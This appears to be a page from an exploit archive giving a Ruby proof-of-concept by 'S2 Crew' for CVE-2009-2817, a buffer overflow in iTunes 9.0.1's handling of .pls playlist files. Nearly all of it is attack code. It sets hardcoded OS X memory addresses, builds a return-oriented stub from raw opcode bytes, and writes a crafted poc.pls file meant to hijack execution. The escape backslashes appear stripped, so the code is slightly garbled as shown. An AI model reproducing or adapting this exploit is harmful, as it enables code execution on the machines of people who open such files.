iTunes 9.0.1 .pls File Handling Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : iTunes 9.0.1 .pls File Handling Buffer Overflow
# Published : 2010-02-17
# Author : S2 Crew
# Previous Title : MediaCoder v0.7.3.4605 Local Buffer Overflow Exploit
# Next Title : OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit

# Exploit Title: iTunes .pls file handling buffer overflow
# Date: 2009.12.20
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: 9.0
# Tested on: OSX 10.5.8, Windows XP SP2? (/GS flag, DOS)
# CVE: CVE-2009-2817

# Code:

#!/usr/bin/env ruby

SETJMP = 0x92F04224
JMP_BUF = 0x8fe31290
STRDUP = 0x92EED110
# 8fe24459 jmp *%eax
JMP_EAX = 0x8fe24459

def make_exec_payload_from_heap_stub()
frag0 =
"x90" + # nop
"x58" + # pop eax
"x61" + # popa
"xc3" # ret
frag1 =
"x90" + # nop
"x58" + # pop eax
"x89xe0" + # mov eax, esp
"x83xc0x0c" + # add eax, byte +0xc
"x89x44x24x08" + # mov [esp+0x8], eax
"xc3" # ret
exec_payload_from_heap_stub =
frag0 +
[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
frag1 +
"X" * 20 +
[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
JMP_EAX].pack("V5") +
"X" * 4
end

payload_cmd = "hereisthetrick"
stub = make_exec_payload_from_heap_stub()
ext = "A" * 59
stub = make_exec_payload_from_heap_stub()
exploit = ext + stub + payload_cmd

# pls file format

file = "[playlist]n"
file += "NumberOfEntries=1n"
file += "File1=http://1/asdf." + exploit + "n"
file += "Title1=asdfn"
file += "Length1=100n"
file += "Version=2" + 'n'

File.open('poc.pls','w') do |f|
f.puts file
f.close
end